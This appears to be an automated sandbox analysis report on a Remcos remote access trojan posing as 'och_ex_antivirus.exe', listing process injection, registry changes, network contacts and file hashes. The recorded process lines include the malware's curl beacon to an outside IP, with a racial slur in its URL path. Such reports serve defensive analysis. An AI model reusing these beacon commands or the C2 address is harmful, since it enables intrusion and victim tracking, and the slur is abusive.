Malware Analysis Report

2024-11-13 18:49

Sample ID 240422-n4l3tsah87
Target och_ex_antivirus.exe
SHA256 042767e0fa4fa7fe964a771a9d743ebb740d4f9a1e59609c704f51958310b1ff
Tags
remcos remotehost evasion rat trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

042767e0fa4fa7fe964a771a9d743ebb740d4f9a1e59609c704f51958310b1ff

Threat Level: Known bad

The file och_ex_antivirus.exe was found to be: Known bad.

Malicious Activity Summary

remcos remotehost evasion rat trojan

Remcos

Checks computer location settings

Loads dropped DLL

Executes dropped EXE

Checks whether UAC is enabled

Drops file in System32 directory

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Modifies Internet Explorer settings

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-22 11:57

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-22 11:57

Reported

2024-04-22 11:59

Platform

win7-20240221-en

Max time kernel

118s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe"

Signatures

Remcos

rat remcos

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2748 set thread context of 2508 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2860 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe
PID 2860 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe
PID 2860 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe
PID 2860 wrote to memory of 2596 N/A C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe
PID 2596 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe
PID 2596 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe
PID 2596 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe
PID 2596 wrote to memory of 2748 N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe
PID 2748 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe
PID 2748 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe
PID 2748 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe
PID 2748 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe
PID 2748 wrote to memory of 2508 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe
PID 2508 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 2508 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 2508 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 2508 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 2508 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 1644 wrote to memory of 2096 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 1644 wrote to memory of 2096 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 1644 wrote to memory of 2096 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 1644 wrote to memory of 2096 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 2096 wrote to memory of 2316 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2096 wrote to memory of 2316 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2096 wrote to memory of 2316 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2096 wrote to memory of 2316 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2508 wrote to memory of 1644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 1644 wrote to memory of 1316 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 1644 wrote to memory of 1316 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 1644 wrote to memory of 1316 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 1644 wrote to memory of 1316 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe

"C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe"

C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe

C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe

C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe

C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\check1.vbs"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl http://94.156.66.107:9000/hooks/nigger?id=QGTQZTRE

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\chthemyndekf.vbs"

Network

Country Destination Domain Proto
FR 178.33.57.155:443 tcp
FR 178.33.57.155:443 tcp
FR 178.33.57.155:443 tcp
FR 178.33.57.155:443 tcp

Files

memory/2860-0-0x0000000100000000-0x0000000101123000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\a4d0d0ec

MD5 47842103e2e4b1f02de9a4dea3b65dcc
SHA1 11bb3c3c1ad4f6b4fc7769ecf14b4f9e5ede5dda
SHA256 0cb81803e081f6491491f74f857d6e738307ede06bd3e9e39f4b5f44c0bd2548
SHA512 18d986698df11ad9032fa0fc90417f0f6b411158c73d93824ec6030908b5d1f5ddbcd4628f7fcab5b8bf04e559ac39b6a85c24449cb126c0b26a9bb24d77b322

memory/2860-6-0x000007FEF6D30000-0x000007FEF6E88000-memory.dmp

memory/2860-8-0x000007FEF6D30000-0x000007FEF6E88000-memory.dmp

memory/2860-15-0x000007FEF6D30000-0x000007FEF6E88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe

MD5 64179e64675e822559cac6652298bdfc
SHA1 cceed3b2441146762512918af7bf7f89fb055583
SHA256 c26db97858c427d92e393396f7cb7f9e7ed8f9ce616adcc123d0ec6b055b99c9
SHA512 ef740b35ea5190f8ee47776af1f15ebdd54d39c84da5665e64f67ae6dd0f4b181e955e9a35319a5d0bd764972562e8f2bc44dbdf83c3bedf05674eae902e7280

memory/2860-30-0x000007FEF6D30000-0x000007FEF6E88000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolsync\MSVCP140.dll

MD5 71a0aa2d05e9174cefd568347bd9c70f
SHA1 cb9247a0fa59e47f72df7d1752424b33a903bbb2
SHA256 fdb3d86c512adff90967cb860d02a4682850ab96727f0376e4d4836504c50e47
SHA512 6e65520528facaa4058720eb16d6bfdcc7bb36923b7e8e6551f3526709f0fabafab123999e618438e6abe7efed4a1332547cfc988f2b24b0e3d91198b95a911a

C:\Users\Admin\AppData\Local\Temp\toolsync\VCRUNTIME140.dll

MD5 16b26bc43943531d7d7e379632ed4e63
SHA1 565287de39649e59e653a3612478c2186096d70a
SHA256 346f72c9a7584c2ab6ce65cd38a616c77ebddc0bbab2274c4e89dd5e62237517
SHA512 b5b7b4b8c5ab4276a34956e43f586272b1803ec3609253fee1bcc0a549aed7ba11d47404b023f7b67af701726bab95cca55738e7bd5bca272eca5ac71bb418cc

C:\Users\Admin\AppData\Local\Temp\toolsync\wbxtrace.dll

MD5 c2b06a78b6c07a1371b6aed1dbf4fc37
SHA1 b8847693e7cd3637b1b400e71430cdf629de2e64
SHA256 9e2b2d67d0e70651a64a3febee9f2698d8a939633587fe973a30758368cffc04
SHA512 219965e4b3e9f237f75d9306bdf5a08c872cded973009da64c58221e1bbdbfda35e4861c4c0b6687fca7c67ef496b307695af5e1270f8d5c3cf71a3fc02c6411

C:\Users\Admin\AppData\Local\Temp\toolsync\ptusredt.dll

MD5 3c3e960d59cb413791fee1e944b6df72
SHA1 4aa6c90d81692642ca8266bf0d8e249ff3e3ad54
SHA256 88378c228d7827974fe6ec827837af7571290e129082e7070d4bff7a42f4ba67
SHA512 85b471aa2a066c6a779384ed102b895af108af51cd718bb834cda107f71bf5e6fcd8ecc77e9ea4fd7fd3ddbc10b1f57870a9bafcbbfa1be8e2ba224651d77aac

C:\Users\Admin\AppData\Local\Temp\toolsync\ptMgr.dll

MD5 2087eb2d3fb639933ebe0a0614fd5218
SHA1 c1a1b75c8e76e000b7045092bd11100904a72840
SHA256 725f50650cb9490027b633a1ff0ae166cb6fc42037dbe72d9a09dd65be323a1f
SHA512 3390536ed543529d01ed7d1616d36d6fde67d68bf6641f901ac5c081ede043943dacd3a7a0bf1729945be800d4ccda00c07511e1c23c7c33d9864be50645502e

memory/2596-41-0x00000000002F0000-0x00000000002F1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolsync\WCLDll.dll

MD5 b3e030ab715a02f8864a79f552a247b7
SHA1 4b1c18370b6e8a69c5f8b3ff543375f74e6e58fa
SHA256 2a844750786ab6798e9a26de7f080802f709c0f12ba7a31545f0c2e449ac0955
SHA512 cd030a0a9e6109b27b5f5d3299024c222287487bc9fac1edd92b760425a939bc307b1d15801fec7e274bd8377b8dd9c7883674d1488af5f062a102275a373eda

C:\Users\Admin\AppData\Local\Temp\toolsync\cyclopedia.html

MD5 db3f3969e8a2f913fe3643d8465171b1
SHA1 736095ea1e02547a6df2586fffdbf31bb7d23656
SHA256 c207be09bf97912ed1271a4186bb626edc530c76f3e5edcac883a98946c41043
SHA512 0a2948bad6e3f6338fb44a727e0de4d268db6a6e5933331b54b12877da0f3b75a796cb32e86cd251b4afc4ca9df5aaccb04db1153b31fc77318ce8909b18d81b

C:\Users\Admin\AppData\Local\Temp\toolsync\audiovisual.psd

MD5 a0a180d2677f494049d7a55c888fed93
SHA1 d09358fddc9a67ae55b5ba4a34fba04357b528db
SHA256 5e086150a36e2e98c91464a210499648832172f883c1bd515c4a0661a10866bd
SHA512 1f152fe593a25c05973b351206a40953bd801b8c77f04c2f20c966869fe72d2b6c71ed5bd77e64942153f0dca590e2655340a93d8b7eb29d558152f1a7b6fde1

memory/2596-45-0x00000000741E0000-0x0000000074354000-memory.dmp

memory/2596-46-0x0000000077620000-0x00000000777C9000-memory.dmp

memory/2748-72-0x0000000000120000-0x0000000000121000-memory.dmp

memory/2748-76-0x0000000074510000-0x0000000074684000-memory.dmp

memory/2748-77-0x0000000077620000-0x00000000777C9000-memory.dmp

memory/2748-78-0x0000000074510000-0x0000000074684000-memory.dmp

memory/2860-79-0x000007FEF6D30000-0x000007FEF6E88000-memory.dmp

memory/2748-80-0x0000000074510000-0x0000000074684000-memory.dmp

memory/2508-82-0x0000000074510000-0x0000000074684000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\afc00fbd

MD5 a44564c5624447597ad73d1a4ad63375
SHA1 229b2fa4ced130aa45395760b1b16b3bd0363ac7
SHA256 e398903e8fdce879747ec96c118306a0e9c1d5aaf41ac79e2c1142b961051bb8
SHA512 e0fd05cbc7a17f58358214950d05163b03008d147c68f31c1db9ff055527d82136e023dab745a7b41abe1ddcbb39ff7c66ed6fe4c4539e6a18d8c75de99f3c8a

memory/2508-84-0x0000000077620000-0x00000000777C9000-memory.dmp

memory/2508-131-0x0000000074510000-0x0000000074684000-memory.dmp

memory/2508-132-0x0000000074510000-0x0000000074684000-memory.dmp

memory/2508-134-0x0000000074510000-0x0000000074684000-memory.dmp

memory/1644-135-0x0000000077620000-0x00000000777C9000-memory.dmp

memory/1644-136-0x0000000000400000-0x0000000000483000-memory.dmp

memory/1644-138-0x0000000000C50000-0x0000000000ED1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\check1.vbs

MD5 85a2ebad40c21ba1da77230265b5351f
SHA1 803822e08837ebda5de7dde963e4872ae2fc4c21
SHA256 b5c409cbb25690b000d9d36c3b5170c1e61fff3d89bdaeadf0166ae28b0fdff9
SHA512 77374eb3d9632c45c25c997380eab1ee338fbe659a24679b3cf28e76d67ffa71e2d2ea326181909d06970dca0e92b5528c1e7f9c866493162fd77170f87ea83a

memory/1644-144-0x0000000000400000-0x0000000000483000-memory.dmp

memory/1644-145-0x0000000000400000-0x0000000000483000-memory.dmp

memory/1644-146-0x0000000000400000-0x0000000000483000-memory.dmp

memory/1644-147-0x0000000000400000-0x0000000000483000-memory.dmp

memory/1644-148-0x0000000000400000-0x0000000000483000-memory.dmp

memory/1644-152-0x0000000000400000-0x0000000000483000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\chthemyndekf.vbs

MD5 20194639a471c85332924601e071aec4
SHA1 6a69ca7f78b34ca6a3959236237ef62de1cf09a2
SHA256 43dddf81fa819e8499eb4a24211a2702ee8a3fc04048d4a8e3b3f4f9420c68e8
SHA512 5616837814bf251f1d007cbaf8002aa66b91b199833437ca236507adaa40ece785264da6857445ab8ae958803453af67f631a0ec0cd1c931c7f3e763c24bc079

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-22 11:57

Reported

2024-04-22 11:59

Platform

win10v2004-20240412-en

Max time kernel

141s

Max time network

139s

Command Line

"C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe"

Signatures

Remcos

rat remcos

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\WScript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1856 set thread context of 956 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe N/A
Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe N/A
Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A
Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000_Classes\Local Settings C:\Windows\SysWOW64\explorer.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3232 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe
PID 3232 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe
PID 3232 wrote to memory of 3948 N/A C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe
PID 3948 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe
PID 3948 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe
PID 3948 wrote to memory of 1856 N/A C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe
PID 1856 wrote to memory of 956 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe
PID 1856 wrote to memory of 956 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe
PID 1856 wrote to memory of 956 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe
PID 1856 wrote to memory of 956 N/A C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe C:\Windows\SysWOW64\cmd.exe
PID 956 wrote to memory of 1084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 956 wrote to memory of 1084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 956 wrote to memory of 1084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 956 wrote to memory of 1084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 1084 wrote to memory of 2472 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 1084 wrote to memory of 2472 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 1084 wrote to memory of 2472 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 2472 wrote to memory of 4980 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2472 wrote to memory of 4980 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2472 wrote to memory of 4980 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4980 wrote to memory of 1500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4980 wrote to memory of 1500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 4980 wrote to memory of 1500 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\curl.exe
PID 956 wrote to memory of 1084 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\explorer.exe
PID 1084 wrote to memory of 4660 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 1084 wrote to memory of 4660 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe
PID 1084 wrote to memory of 4660 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\WScript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe

"C:\Users\Admin\AppData\Local\Temp\och_ex_antivirus.exe"

C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe

C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe

C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe

C:\Users\Admin\AppData\Roaming\toolsync\ptSrv.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\explorer.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\check1.vbs"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c curl http://94.156.66.107:9000/hooks/nigger?id=QUBJEIMO

C:\Windows\SysWOW64\curl.exe

curl http://94.156.66.107:9000/hooks/nigger?id=QUBJEIMO

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\upeegjbouopehpnbxkclalylbt.vbs"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 241.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 21.114.53.23.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 28.143.109.104.in-addr.arpa udp
FR 178.33.57.155:443 tcp
FR 178.33.57.155:443 tcp
US 8.8.8.8:53 155.57.33.178.in-addr.arpa udp
NL 94.156.66.107:9000 tcp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
FR 178.33.57.155:443 tcp
FR 178.33.57.155:443 tcp
US 8.8.8.8:53 219.138.73.23.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
FR 178.33.57.155:443 tcp
FR 178.33.57.155:443 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/3232-0-0x00007FF7915A0000-0x00007FF7926C3000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\e53664e3

MD5 47842103e2e4b1f02de9a4dea3b65dcc
SHA1 11bb3c3c1ad4f6b4fc7769ecf14b4f9e5ede5dda
SHA256 0cb81803e081f6491491f74f857d6e738307ede06bd3e9e39f4b5f44c0bd2548
SHA512 18d986698df11ad9032fa0fc90417f0f6b411158c73d93824ec6030908b5d1f5ddbcd4628f7fcab5b8bf04e559ac39b6a85c24449cb126c0b26a9bb24d77b322

memory/3232-6-0x00007FF8CB900000-0x00007FF8CBA72000-memory.dmp

memory/3232-8-0x00007FF8CB900000-0x00007FF8CBA72000-memory.dmp

memory/3232-25-0x00007FF8CB900000-0x00007FF8CBA72000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\toolsync\ptSrv.exe

MD5 64179e64675e822559cac6652298bdfc
SHA1 cceed3b2441146762512918af7bf7f89fb055583
SHA256 c26db97858c427d92e393396f7cb7f9e7ed8f9ce616adcc123d0ec6b055b99c9
SHA512 ef740b35ea5190f8ee47776af1f15ebdd54d39c84da5665e64f67ae6dd0f4b181e955e9a35319a5d0bd764972562e8f2bc44dbdf83c3bedf05674eae902e7280

C:\Users\Admin\AppData\Local\Temp\toolsync\VCRUNTIME140.dll

MD5 16b26bc43943531d7d7e379632ed4e63
SHA1 565287de39649e59e653a3612478c2186096d70a
SHA256 346f72c9a7584c2ab6ce65cd38a616c77ebddc0bbab2274c4e89dd5e62237517
SHA512 b5b7b4b8c5ab4276a34956e43f586272b1803ec3609253fee1bcc0a549aed7ba11d47404b023f7b67af701726bab95cca55738e7bd5bca272eca5ac71bb418cc

C:\Users\Admin\AppData\Local\Temp\toolsync\MSVCP140.dll

MD5 71a0aa2d05e9174cefd568347bd9c70f
SHA1 cb9247a0fa59e47f72df7d1752424b33a903bbb2
SHA256 fdb3d86c512adff90967cb860d02a4682850ab96727f0376e4d4836504c50e47
SHA512 6e65520528facaa4058720eb16d6bfdcc7bb36923b7e8e6551f3526709f0fabafab123999e618438e6abe7efed4a1332547cfc988f2b24b0e3d91198b95a911a

C:\Users\Admin\AppData\Local\Temp\toolsync\wbxtrace.dll

MD5 c2b06a78b6c07a1371b6aed1dbf4fc37
SHA1 b8847693e7cd3637b1b400e71430cdf629de2e64
SHA256 9e2b2d67d0e70651a64a3febee9f2698d8a939633587fe973a30758368cffc04
SHA512 219965e4b3e9f237f75d9306bdf5a08c872cded973009da64c58221e1bbdbfda35e4861c4c0b6687fca7c67ef496b307695af5e1270f8d5c3cf71a3fc02c6411

C:\Users\Admin\AppData\Local\Temp\toolsync\ptusredt.dll

MD5 3c3e960d59cb413791fee1e944b6df72
SHA1 4aa6c90d81692642ca8266bf0d8e249ff3e3ad54
